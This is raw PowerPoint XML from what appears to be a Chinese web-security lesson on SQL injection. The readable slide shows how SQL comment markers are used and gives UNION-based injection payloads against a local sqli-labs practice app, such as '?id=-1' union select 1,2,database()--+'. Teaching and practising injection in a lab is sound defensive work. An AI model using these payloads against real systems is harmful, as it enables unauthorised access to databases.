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9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290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94549" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="80" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="-667" y="-72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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2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8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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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0668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128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CD977-67E9-4614-8FF3-168F5B1F24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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main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3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sqli-labs/Less-1/?id=1'" TargetMode="Externa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09 WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>之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注入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注入相关的注释（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527051" y="1628775"/>
            <a:ext cx="11040533" cy="4248150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>号不显，变空格）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqlilabs/Less-1/?id=-1' union select 1,2,database()--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>对应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Select * from users where id='-1' union select 1,2,database()--' LIMIT 0,1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>有时需要转换成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编码即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqlilabs/Less-1/?id=-1' union select 1,2,database()#</a:t>
            </a:r>
          </a:p>
          <a:p>
